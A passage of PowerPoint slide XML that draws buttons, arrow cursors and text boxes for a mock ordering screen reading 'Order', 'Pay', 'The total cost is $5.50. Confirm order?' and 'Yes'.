                  <a:pt x="1105052" y="147332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1097541" y="100764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076624" y="60320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1044729" y="28426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004281" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="957707" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="51A7F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34" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E805F38-472E-2D46-ACC0-DC7A12415196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3403600" y="4013200"/>
            <a:ext cx="6143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700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Order</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26635" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D084EDD8-B6B0-6243-84FB-25F623CF67AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3875088" y="4173538"/>
            <a:ext cx="487362" cy="4953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36" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0655046D-88BA-2B4C-B0F0-088B20DC1851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4008438" y="4278313"/>
            <a:ext cx="257175" cy="292100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 231785 w 257175"/>
              <a:gd name="T1" fmla="*/ 209245 h 292100"/>
              <a:gd name="T2" fmla="*/ 116827 w 257175"/>
              <a:gd name="T3" fmla="*/ 209245 h 292100"/>
              <a:gd name="T4" fmla="*/ 185521 w 257175"/>
              <a:gd name="T5" fmla="*/ 291706 h 292100"/>
              <a:gd name="T6" fmla="*/ 253390 w 257175"/>
              <a:gd name="T7" fmla="*/ 235178 h 292100"/>
              <a:gd name="T8" fmla="*/ 231785 w 257175"/>
              <a:gd name="T9" fmla="*/ 209245 h 292100"/>
              <a:gd name="T10" fmla="*/ 0 w 257175"/>
              <a:gd name="T11" fmla="*/ 0 h 292100"/>
              <a:gd name="T12" fmla="*/ 44716 w 257175"/>
              <a:gd name="T13" fmla="*/ 269303 h 292100"/>
              <a:gd name="T14" fmla="*/ 116827 w 257175"/>
              <a:gd name="T15" fmla="*/ 209245 h 292100"/>
              <a:gd name="T16" fmla="*/ 231785 w 257175"/>
              <a:gd name="T17" fmla="*/ 209245 h 292100"/>
              <a:gd name="T18" fmla="*/ 184683 w 257175"/>
              <a:gd name="T19" fmla="*/ 152704 h 292100"/>
              <a:gd name="T20" fmla="*/ 256793 w 257175"/>
              <a:gd name="T21" fmla="*/ 92646 h 292100"/>
              <a:gd name="T22" fmla="*/ 0 w 257175"/>
              <a:gd name="T23" fmla="*/ 0 h 292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175" h="292100">
                <a:moveTo>
                  <a:pt x="231785" y="209245"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="116827" y="209245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185521" y="291706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253390" y="235178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231785" y="209245"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="257175" h="292100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44716" y="269303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116827" y="209245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231785" y="209245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184683" y="152704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256793" y="9264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37" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F18137-3F5F-D849-B2CE-694C126E85F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5545138" y="2900363"/>
            <a:ext cx="2787650" cy="25558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38" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA2579DA-CEF7-6D43-8FCA-C47B493F9B48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5565775" y="2911475"/>
            <a:ext cx="2747963" cy="25146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5" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4BACD3-FECB-804D-91FB-04345611B63A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="2870200"/>
            <a:ext cx="627063" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Pay</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774629B4-2C40-6249-AA37-6AE3F0E1DC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5880100" y="3663950"/>
            <a:ext cx="2122488" cy="738188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The total cost is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$5.50.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Confirm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>order?</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26641" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE481F9B-D39B-4E4A-9B0D-FB21C3A75FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5745163" y="4540250"/>
            <a:ext cx="1144587" cy="4937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42" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0419582A-3A39-BC45-B0D9-1E95F3D4E582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5765800" y="4549775"/>
            <a:ext cx="1104900" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 945153 w 1105534"/>
              <a:gd name="T1" fmla="*/ 0 h 455295"/>
              <a:gd name="T2" fmla="*/ 145415 w 1105534"/>
              <a:gd name="T3" fmla="*/ 0 h 455295"/>
              <a:gd name="T4" fmla="*/ 99455 w 1105534"/>
              <a:gd name="T5" fmla="*/ 7626 h 455295"/>
              <a:gd name="T6" fmla="*/ 59541 w 1105534"/>
              <a:gd name="T7" fmla="*/ 28886 h 455295"/>
              <a:gd name="T8" fmla="*/ 28063 w 1105534"/>
              <a:gd name="T9" fmla="*/ 61296 h 455295"/>
              <a:gd name="T10" fmla="*/ 7420 w 1105534"/>
              <a:gd name="T11" fmla="*/ 102394 h 455295"/>
              <a:gd name="T12" fmla="*/ 0 w 1105534"/>
              <a:gd name="T13" fmla="*/ 149715 h 455295"/>
              <a:gd name="T14" fmla="*/ 0 w 1105534"/>
              <a:gd name="T15" fmla="*/ 312869 h 455295"/>
              <a:gd name="T16" fmla="*/ 7420 w 1105534"/>
              <a:gd name="T17" fmla="*/ 360192 h 455295"/>
              <a:gd name="T18" fmla="*/ 28063 w 1105534"/>
              <a:gd name="T19" fmla="*/ 401291 h 455295"/>
              <a:gd name="T20" fmla="*/ 59541 w 1105534"/>
              <a:gd name="T21" fmla="*/ 433700 h 455295"/>
              <a:gd name="T22" fmla="*/ 99455 w 1105534"/>
              <a:gd name="T23" fmla="*/ 454955 h 455295"/>
              <a:gd name="T24" fmla="*/ 145415 w 1105534"/>
              <a:gd name="T25" fmla="*/ 462588 h 455295"/>
              <a:gd name="T26" fmla="*/ 945153 w 1105534"/>
              <a:gd name="T27" fmla="*/ 462588 h 455295"/>
              <a:gd name="T28" fmla="*/ 991117 w 1105534"/>
              <a:gd name="T29" fmla="*/ 454955 h 455295"/>
              <a:gd name="T30" fmla="*/ 1031036 w 1105534"/>
              <a:gd name="T31" fmla="*/ 433700 h 455295"/>
              <a:gd name="T32" fmla="*/ 1062513 w 1105534"/>
              <a:gd name="T33" fmla="*/ 401291 h 455295"/>
              <a:gd name="T34" fmla="*/ 1083155 w 1105534"/>
              <a:gd name="T35" fmla="*/ 360192 h 455295"/>
              <a:gd name="T36" fmla="*/ 1090568 w 1105534"/>
              <a:gd name="T37" fmla="*/ 312869 h 455295"/>
              <a:gd name="T38" fmla="*/ 1090568 w 1105534"/>
              <a:gd name="T39" fmla="*/ 149715 h 455295"/>
              <a:gd name="T40" fmla="*/ 1083155 w 1105534"/>
              <a:gd name="T41" fmla="*/ 102394 h 455295"/>
              <a:gd name="T42" fmla="*/ 1062513 w 1105534"/>
              <a:gd name="T43" fmla="*/ 61296 h 455295"/>
              <a:gd name="T44" fmla="*/ 1031036 w 1105534"/>
              <a:gd name="T45" fmla="*/ 28886 h 455295"/>
              <a:gd name="T46" fmla="*/ 991117 w 1105534"/>
              <a:gd name="T47" fmla="*/ 7626 h 455295"/>
              <a:gd name="T48" fmla="*/ 945153 w 1105534"/>
              <a:gd name="T49" fmla="*/ 0 h 4552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5534" h="455295">
                <a:moveTo>
                  <a:pt x="957706" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="147345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100775" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60328" y="28426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28431" y="60320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7512" y="100764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="307886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7512" y="354454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28431" y="394898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60328" y="426791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100775" y="447707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147345" y="455218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="957706" y="455218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004281" y="447707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1044729" y="426791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076624" y="394898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1097541" y="354454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105052" y="307886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105052" y="147332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1097541" y="100764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076624" y="60320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1044729" y="28426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004281" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="957706" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="51A7F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9" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76FD4B48-62EC-064C-9409-7F753F26F6DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6121400" y="4648200"/>
            <a:ext cx="398463" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" b="1" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26644" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{072E4E87-A225-0F4D-BB2B-D7F261692FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6513513" y="4799013"/>
            <a:ext cx="485775" cy="4953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45" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12453499-7AC4-BC43-B0E9-72F2E164F59B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6646863" y="4905375"/>
            <a:ext cx="257175" cy="292100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 231775 w 257175"/>
              <a:gd name="T1" fmla="*/ 209232 h 292100"/>
              <a:gd name="T2" fmla="*/ 116827 w 257175"/>
              <a:gd name="T3" fmla="*/ 209232 h 292100"/>
              <a:gd name="T4" fmla="*/ 185534 w 257175"/>
              <a:gd name="T5" fmla="*/ 291706 h 292100"/>
              <a:gd name="T6" fmla="*/ 253390 w 257175"/>
              <a:gd name="T7" fmla="*/ 235178 h 292100"/>
              <a:gd name="T8" fmla="*/ 231775 w 257175"/>
              <a:gd name="T9" fmla="*/ 209232 h 292100"/>
              <a:gd name="T10" fmla="*/ 0 w 257175"/>
              <a:gd name="T11" fmla="*/ 0 h 292100"/>
              <a:gd name="T12" fmla="*/ 44716 w 257175"/>
              <a:gd name="T13" fmla="*/ 269303 h 292100"/>
              <a:gd name="T14" fmla="*/ 116827 w 257175"/>
              <a:gd name="T15" fmla="*/ 209232 h 292100"/>
              <a:gd name="T16" fmla="*/ 231775 w 257175"/>
              <a:gd name="T17" fmla="*/ 209232 h 292100"/>
              <a:gd name="T18" fmla="*/ 184683 w 257175"/>
              <a:gd name="T19" fmla="*/ 152704 h 292100"/>
              <a:gd name="T20" fmla="*/ 256794 w 257175"/>
              <a:gd name="T21" fmla="*/ 92633 h 292100"/>
              <a:gd name="T22" fmla="*/ 0 w 257175"/>
              <a:gd name="T23" fmla="*/ 0 h 292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175" h="292100">
                <a:moveTo>
                  <a:pt x="231775" y="209232"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="116827" y="209232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185534" y="291706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253390" y="235178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231775" y="209232"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="257175" h="292100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44716" y="269303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116827" y="209232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231775" y="209232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184683" y="152704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256794" y="926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6" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9767CC4-8904-E14C-B4A0-1306B21CA73C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6999288" y="4540250"/>
            <a:ext cx="1144587" cy="4937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6647" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{133DA5CF-01FB-BE46-AFF5-758671F7DBAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7019925" y="4549775"/>
            <a:ext cx="1104900" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 945154 w 1105534"/>
              <a:gd name="T1" fmla="*/ 0 h 455295"/>
              <a:gd name="T2" fmla="*/ 145402 w 1105534"/>
              <a:gd name="T3" fmla="*/ 0 h 455295"/>
              <a:gd name="T4" fmla="*/ 99444 w 1105534"/>
              <a:gd name="T5" fmla="*/ 7626 h 455295"/>
              <a:gd name="T6" fmla="*/ 59533 w 1105534"/>
              <a:gd name="T7" fmla="*/ 28886 h 455295"/>
              <a:gd name="T8" fmla="*/ 28058 w 1105534"/>
              <a:gd name="T9" fmla="*/ 61296 h 455295"/>
              <a:gd name="T10" fmla="*/ 7419 w 1105534"/>
              <a:gd name="T11" fmla="*/ 102394 h 455295"/>
              <a:gd name="T12" fmla="*/ 0 w 1105534"/>
              <a:gd name="T13" fmla="*/ 149715 h 455295"/>
              <a:gd name="T14" fmla="*/ 0 w 1105534"/>
              <a:gd name="T15" fmla="*/ 312869 h 455295"/>
              <a:gd name="T16" fmla="*/ 7419 w 1105534"/>
              <a:gd name="T17" fmla="*/ 360192 h 455295"/>
              <a:gd name="T18" fmla="*/ 28058 w 1105534"/>
              <a:gd name="T19" fmla="*/ 401291 h 455295"/>
              <a:gd name="T20" fmla="*/ 59533 w 1105534"/>
              <a:gd name="T21" fmla="*/ 433700 h 455295"/>
              <a:gd name="T22" fmla="*/ 99444 w 1105534"/>
              <a:gd name="T23" fmla="*/ 454955 h 455295"/>
              <a:gd name="T24" fmla="*/ 145402 w 1105534"/>
              <a:gd name="T25" fmla="*/ 462588 h 455295"/>
              <a:gd name="T26" fmla="*/ 945154 w 1105534"/>
              <a:gd name="T27" fmla="*/ 462588 h 455295"/>
              <a:gd name="T28" fmla="*/ 991112 w 1105534"/>
              <a:gd name="T29" fmla="*/ 454955 h 455295"/>
              <a:gd name="T30" fmla="*/ 1031030 w 1105534"/>
              <a:gd name="T31" fmla="*/ 433700 h 455295"/>
              <a:gd name="T32" fmla="*/ 1062510 w 1105534"/>
              <a:gd name="T33" fmla="*/ 401291 h 455295"/>
              <a:gd name="T34" fmla="*/ 1083153 w 1105534"/>
              <a:gd name="T35" fmla="*/ 360192 h 455295"/>
              <a:gd name="T36" fmla="*/ 1090568 w 1105534"/>
              <a:gd name="T37" fmla="*/ 312869 h 455295"/>
              <a:gd name="T38" fmla="*/ 1090568 w 1105534"/>
              <a:gd name="T39" fmla="*/ 149715 h 455295"/>
              <a:gd name="T40" fmla="*/ 1083153 w 1105534"/>
              <a:gd name="T41" fmla="*/ 102394 h 455295"/>
              <a:gd name="T42" fmla="*/ 1062510 w 1105534"/>
              <a:gd name="T43" fmla="*/ 61296 h 455295"/>
              <a:gd name="T44" fmla="*/ 1031030 w 1105534"/>
              <a:gd name="T45" fmla="*/ 28886 h 455295"/>
              <a:gd name="T46" fmla="*/ 991112 w 1105534"/>
              <a:gd name="T47" fmla="*/ 7626 h 455295"/>
              <a:gd name="T48" fmla="*/ 945154 w 1105534"/>
              <a:gd name="T49" fmla="*/ 0 h 4552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5534" h="455295">
                <a:moveTo>
                  <a:pt x="957707" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="147332" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100764" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60320" y="28426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28426" y="60320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7511" y="100764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="307886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7511" y="354454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28426" y="394898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60320" y="426791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100764" y="447707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147332" y="455218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="957707" y="455218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004276" y="447707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1044723" y="426791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076621" y="394898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1097539" y="354454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105052" y="307886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105052" y="147332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1097539" y="100764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076621" y="60320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1044723" y="28426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004276" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="957707" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="51A7F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6648" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80D0E3C9-0D8A-6744-B4CF-2DC161BD4616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
